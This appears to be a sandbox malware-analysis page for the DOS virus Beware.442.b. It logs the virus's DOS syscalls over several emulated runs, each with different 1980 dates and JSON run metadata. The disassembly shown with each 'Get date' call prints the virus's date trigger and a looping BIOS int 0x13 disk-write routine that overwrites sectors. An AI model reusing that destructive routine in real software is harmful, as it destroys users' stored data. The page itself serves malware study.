Sample viewer

vx.netlux.org/Virus.DOS.Beware.442.b

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:04:44.210543167Z	17	PC: 13c62 \| Find first file
2018-12-17T22:04:44.212669779Z	66	PC: 13d07 \| Move file pointer
2018-12-17T22:04:44.214106289Z	42	PC: 13d59 \| Get date 0x13d59: cmp dl, 1 0x13d5c: jne 0x13d72 0x13d5e: cmp al, 1 0x13d60: jne 0x13d72 0x13d62: mov ax, 0x30f 0x13d65: mov cx, 1 0x13d68: xor dh, dh 0x13d6a: mov dl, 0 0x13d6c: int 0x13 0x13d6e: inc ch 0x13d70: jmp 0x13d6c 0x13d72: ret 0x13d73: loopne 0x13da9 0x13d75: inc si 0x13d76: adc cx, word ptr [bx - 0xb96] 0x13d7a: stosb byte ptr es:[di], al 0x13d7b: scasb al, byte ptr es:[di] 0x13d7c: ret 0x13d7d: iret 0x13d7e: int 0x80
2018-12-17T22:04:44.216168366Z	26	PC: 13c1c \| Set disk transfer address
2018-12-17T22:04:44.217556392Z	78	PC: 13c27 \| Find first file
2018-12-17T22:04:44.221817925Z	42	PC: 13d59 \| Get date 0x13d59: cmp dl, 1 0x13d5c: jne 0x13d72 0x13d5e: cmp al, 1 0x13d60: jne 0x13d72 0x13d62: mov ax, 0x30f 0x13d65: mov cx, 1 0x13d68: xor dh, dh 0x13d6a: mov dl, 0 0x13d6c: int 0x13 0x13d6e: inc ch 0x13d70: jmp 0x13d6c 0x13d72: ret 0x13d73: loopne 0x13da9 0x13d75: inc si 0x13d76: adc cx, word ptr [bx - 0xb96] 0x13d7a: stosb byte ptr es:[di], al 0x13d7b: scasb al, byte ptr es:[di] 0x13d7c: ret 0x13d7d: iret 0x13d7e: int 0x80

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":1643,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:44:00.632226632Z	17	PC: 13c62 \| Find first file
2018-12-25T11:44:00.63455929Z	66	PC: 13d07 \| Move file pointer
2018-12-25T11:44:00.636246767Z	42	PC: 13d59 \| Get date 0x13d59: cmp dl, 1 0x13d5c: jne 0x13d72 0x13d5e: cmp al, 1 0x13d60: jne 0x13d72 0x13d62: mov ax, 0x30f 0x13d65: mov cx, 1 0x13d68: xor dh, dh 0x13d6a: mov dl, 0 0x13d6c: int 0x13 0x13d6e: inc ch 0x13d70: jmp 0x13d6c 0x13d72: ret 0x13d73: loopne 0x13da9 0x13d75: inc si 0x13d76: adc cx, word ptr [bx - 0xb96] 0x13d7a: stosb byte ptr es:[di], al 0x13d7b: scasb al, byte ptr es:[di] 0x13d7c: ret 0x13d7d: iret 0x13d7e: int 0x80
2018-12-25T11:44:00.638751025Z	26	PC: 13c1c \| Set disk transfer address
2018-12-25T11:44:00.640191311Z	78	PC: 13c27 \| Find first file
2018-12-25T11:44:00.646675422Z	42	PC: 13d59 \| Get date (See above)

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":1643,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:44:00.680146706Z	17	PC: 13c62 \| Find first file
2018-12-25T11:44:00.687581632Z	66	PC: 13d07 \| Move file pointer
2018-12-25T11:44:00.689046997Z	42	PC: 13d59 \| Get date 0x13d59: cmp dl, 1 0x13d5c: jne 0x13d72 0x13d5e: cmp al, 1 0x13d60: jne 0x13d72 0x13d62: mov ax, 0x30f 0x13d65: mov cx, 1 0x13d68: xor dh, dh 0x13d6a: mov dl, 0 0x13d6c: int 0x13 0x13d6e: inc ch 0x13d70: jmp 0x13d6c 0x13d72: ret 0x13d73: loopne 0x13da9 0x13d75: inc si 0x13d76: adc cx, word ptr [bx - 0xb96] 0x13d7a: stosb byte ptr es:[di], al 0x13d7b: scasb al, byte ptr es:[di] 0x13d7c: ret 0x13d7d: iret 0x13d7e: int 0x80
2018-12-25T11:44:00.69124232Z	26	PC: 13c1c \| Set disk transfer address
2018-12-25T11:44:00.693052137Z	78	PC: 13c27 \| Find first file
2018-12-25T11:44:00.697167486Z	42	PC: 13d59 \| Get date (See above)

{"DateBased":true,"Day":1,"Month":9,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":1643,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:44:01.86583802Z	17	PC: 13c62 \| Find first file
2018-12-25T11:44:01.868194867Z	66	PC: 13d07 \| Move file pointer
2018-12-25T11:44:01.869481881Z	42	PC: 13d59 \| Get date 0x13d59: cmp dl, 1 0x13d5c: jne 0x13d72 0x13d5e: cmp al, 1 0x13d60: jne 0x13d72 0x13d62: mov ax, 0x30f 0x13d65: mov cx, 1 0x13d68: xor dh, dh 0x13d6a: mov dl, 0 0x13d6c: int 0x13 0x13d6e: inc ch 0x13d70: jmp 0x13d6c 0x13d72: ret 0x13d73: loopne 0x13da9 0x13d75: inc si 0x13d76: adc cx, word ptr [bx - 0xb96] 0x13d7a: stosb byte ptr es:[di], al 0x13d7b: scasb al, byte ptr es:[di] 0x13d7c: ret 0x13d7d: iret 0x13d7e: int 0x80